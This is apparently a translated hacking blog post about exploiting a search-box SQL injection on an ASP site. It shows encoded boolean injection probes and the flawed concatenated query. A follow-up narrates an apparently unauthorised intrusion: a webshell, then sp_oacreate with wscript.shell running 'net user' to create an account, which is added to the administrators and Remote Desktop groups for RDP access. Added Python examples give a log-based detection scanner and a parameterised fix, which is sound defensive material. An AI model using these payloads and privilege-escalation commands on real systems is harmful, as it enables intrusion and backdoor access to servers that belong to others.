A Simple Analysis of search-type non-variable injection points


Author: Sai52 [B. H.S. T]
Blog: www.sai52.com

The day before, someone tossed me an injection point and then went off to dinner by himself. Let me start by saying he has my contempt for that.

Injection point: http://www.site.com/Train_List.asp?xyz=
Its peculiarity is that it can be injected with no value in the parameter at all, but the response is extremely slow.

Going to the home page www.site.com, there is basically nothing to work with apart from a search box.
Enter a single quote (') in the search box and click "Search": you get an error page at http://www.site.com/main.asp?xyz='

Error message:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ' order by gceek'.
/Train_List.asp, line 25

Enter % in the search box and click "Search"; after about a minute (because of the amount of data, not a slow network) you get the normal results page at http://www.site.com/main.asp?xyz=%

So search injection exists.
Testing further, I found a keyword that returns results, "Beijing" (北京), and entered 北京%' and '1'='1' and '%'=' and 北京%' and '1'='2' and '%'=' into the search box separately. The two pages returned were identical: both blank pages with no data.

From the error message above we can guess that http://www.site.com/main.asp is only the form page, and the page actually being injected is http://www.site.com/Train_List.asp.

Searching Google for "http://www.site.com/train_list.asp" turns up a record: http://www.site.com/Train_List.asp?xyz=%C9%CF%BA%A3. Opening it displays normal search results for the keyword "Shanghai" (%C9%CF%BA%A3 is the URL encoding of 上海, "Shanghai").

Combining this with the earlier information, we can determine that the parameter of http://www.site.com/Train_List.asp is xyz. Test further:
http://www.site.com/Train_List.asp?xyz=%B1%B1%BE%A9%25%27%20%61%6E%64%20%27%31%27%3D%27%31%27%20%61%6E%64%20%27%25%3D%27
(URL encoding of 北京%' and '1'='1' and '%'=', with 北京 "Beijing" encoded as GBK)

Returns the search results for the keyword 北京 (Beijing).

http://www.site.com/Train_List.asp?xyz=%B1%B1%BE%A9%25%27%20%61%6E%64%20%27%31%27%3D%27%32%27%20%61%6E%64%20%27%25%3D%27
(URL encoding of 北京%' and '1'='2' and '%'=')

Returns a blank page without data.

This confirms that there is an injection point.
Pick the keyword with the least data, "Guangdong East" (to speed up the response), build the URL http://www.site.com/Train_List.asp?xyz=Guangdong East% and feed it to an injection vulnerability scanner. Ha, now it is fast and everything comes out in no time.
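From the defender's side, the three probes above (a lone quote that produces a database error, a lone % that returns everything after a long wait, and the '1'='1' / '1'='2' pair) leave a recognisable trace in the web server log. The following is an added example, not code from the original post: it decodes the xyz parameter the way the site does (percent-decoding to bytes, then GBK, so that 上海 and %61%6E%64-style encodings of plain ASCII both collapse to text) and labels each request. The log lines are constructed in the shape of an IIS W3C log; the date, times and status codes are made up, and the assumption that the ADO error page was served with HTTP 500 is mine.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed W3C-style log lines (date time method cs-uri-stem cs-uri-query
# sc-status). The query strings reproduce the probes made against the site
# above; hosts, times and status codes are made up for this example.
SAMPLE_LOG = [
    "2009-03-01 10:00:00 GET /Train_List.asp xyz=%C9%CF%BA%A3 200",
    "2009-03-01 10:00:05 GET /main.asp xyz=%27 500",
    "2009-03-01 10:00:09 GET /main.asp xyz=%25 200",
    "2009-03-01 10:00:20 GET /Train_List.asp xyz=%B1%B1%BE%A9%25%27%20%61%6E%64%20%27%31%27%3D%27%31%27%20%61%6E%64%20%27%25%3D%27 200",
    "2009-03-01 10:00:31 GET /Train_List.asp xyz=%B1%B1%BE%A9 200",
]

# A quote followed by AND/OR and a numeric (optionally quoted) equality:
# the '1'='1' / '1'='2' pair used above to confirm the injection.
TAUTOLOGY = re.compile(r"'\s*(?:and|or)\s*'?\d+'?\s*=\s*'?\d+", re.IGNORECASE)


def decode_param(query, name, charset="gbk"):
    """Return the named query parameter fully percent-decoded as text.

    Decoding to bytes first and only then to GBK matters: the site encodes
    Chinese keywords as GBK (%C9%CF%BA%A3 is 上海), and %61%6E%64-style
    encoding of plain ASCII ('and') must collapse before pattern matching.
    """
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key == name:
            return unquote_to_bytes(raw).decode(charset, errors="replace")
    return None


def classify(line):
    """Label one log line as tautology, quote_error, wildcard_only or normal."""
    _date, _time, _method, stem, query, status = line.split()
    value = decode_param(query, "xyz")
    if value is None:
        return (stem, "normal")
    if TAUTOLOGY.search(value):
        return (stem, "tautology")
    # Assumption: the unhandled ADO error page is served as HTTP 500.
    if "'" in value and status == "500":
        return (stem, "quote_error")
    # Only LIKE wildcards: the "return the whole table" probe.
    if value and value.strip("%_ ") == "":
        return (stem, "wildcard_only")
    return (stem, "normal")


def scan_log(lines):
    """Return the (stem, label) pairs of every line that is not 'normal'."""
    return [classify(l) for l in lines if classify(l)[1] != "normal"]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "<-", line)
```

The point of the GBK step is that a rule matching on the raw query string would see %61%6E%64 rather than "and"; normalise first, then match. In a real deployment the status-code check should be paired with the application's own error log, since the 500 is only a proxy for the "unclosed quotation mark" error.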

So why can http://www.site.com/Train_List.asp?xyz= be injected with no value in the parameter at all?
Analyze the source code.

Key statements:
ElseIf xyz <> "" Then
    SQL = "select * from Train_all where lm like '%" & xyz & "%' order by gceek"

If the parameter xyz is not empty, it is concatenated straight into the query.

The string we constructed earlier is 北京%' and '1'='1' and '%'='
SQL = "select * from Train_all where lm like '%北京%' and '1'='1' and '%'='%' order by gceek"
This forms the injection; the result is every row whose lm contains the keyword 北京 (Beijing).

Now substitute the same construction with no keyword in front of it: ' and '1'='1' and '%'='
SQL = "select * from Train_all where lm like '%' and '1'='1' and '%'='%' order by gceek"
This is still an injection, and because '%' on its own is a wildcard that matches anything, the result is every row in the table.

When the query runs with no keyword supplied, the server returns every row of the table, so the response is naturally slow.
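To make the source-code analysis above concrete, here is an added example (not code from the original post or the site) that rebuilds the page's concatenated LIKE query in Python against an in-memory SQLite table, and puts the hardened form beside it. The table name Train_all and the columns lm and gceek come from the page; the sample rows are constructed. vulnerable_search shows the three behaviours the post observed (a quote breaks the statement, a bare % returns the whole table, and the '1'='1' / '1'='2' pair changes the result), while safe_search binds the keyword as a parameter, escapes LIKE metacharacters so % and _ are matched literally, and refuses an empty keyword instead of dumping the table.

```python
import sqlite3

# Constructed stand-in for the page's Train_all table: lm holds the searchable
# text and gceek the sort key. The rows are made up for this example.
SAMPLE_ROWS = [("北京-上海", 1), ("北京-广州", 2), ("上海-杭州", 3), ("广东东部-深圳", 4)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Train_all (lm TEXT, gceek INTEGER)")
    conn.executemany("INSERT INTO Train_all VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_search(conn, xyz):
    """Rebuilds the page's ASP concatenation (same shape, same defect).

    Returns the matching lm values, or the string "SQL_ERROR" when the
    database rejects the statement (the 'unclosed quotation mark' case).
    """
    sql = "select * from Train_all where lm like '%" + xyz + "%' order by gceek"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return "SQL_ERROR"


def escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so user text is matched literally."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def safe_search(conn, xyz):
    """Hardened form: parameter binding, wildcard escaping, and an empty
    keyword returns nothing rather than the whole table."""
    if not xyz.strip():
        return []
    pattern = "%" + escape_like(xyz) + "%"
    sql = "select * from Train_all where lm like ? escape '\\' order by gceek"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    db = make_db()
    probes = ["北京", "'", "%", "北京%' and '1'='1' and '%'='",
              "北京%' and '1'='2' and '%'='", "' and '1'='1' and '%'='", ""]
    for probe in probes:
        print(repr(probe))
        print("  vulnerable ->", vulnerable_search(db, probe))
        print("  safe       ->", safe_search(db, probe))
```

Binding the parameter is what stops the quote from terminating the string literal; escaping % and _ is a separate fix, needed because a bound parameter still reaches LIKE as a pattern, so a bare % would otherwise still return every row (the slow, whole-table response the post describes). The empty-keyword check closes the remaining case where the application itself builds a pattern of nothing but wildcards.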

Follow-up:
After that it was straightforward. The injection point runs as sa, but the administrator had locked the server down: the xp_cmdshell extended stored procedure and the xplog70.dll file had both been deleted. The webshell I obtained had read and modify permissions but no write or delete permission. I changed the webshell code into an ASP probe, found that wscript.shell (the command-execution component) was present, found the database connection account and password, connected with Query Analyzer and executed:
declare @shell int
exec sp_oacreate 'wscript.shell', @shell output
exec sp_oamethod @shell, 'run', null, 'c:\windows\system32\cmd.exe /c net user sai52 xxxxxxxxxxxx /add'
The user was added successfully.

(For sp_oacreate to run cmd and show its output, both wscript.shell and scripting.FileSystemObject are needed.)

Then I ran the commands directly with the tool NBSI:
net localgroup administrators sai52 /add
net user sai52 /active:yes
net localgroup "Remote Desktop Users" sai52 /add
Then log on over 3389 (Remote Desktop).

 
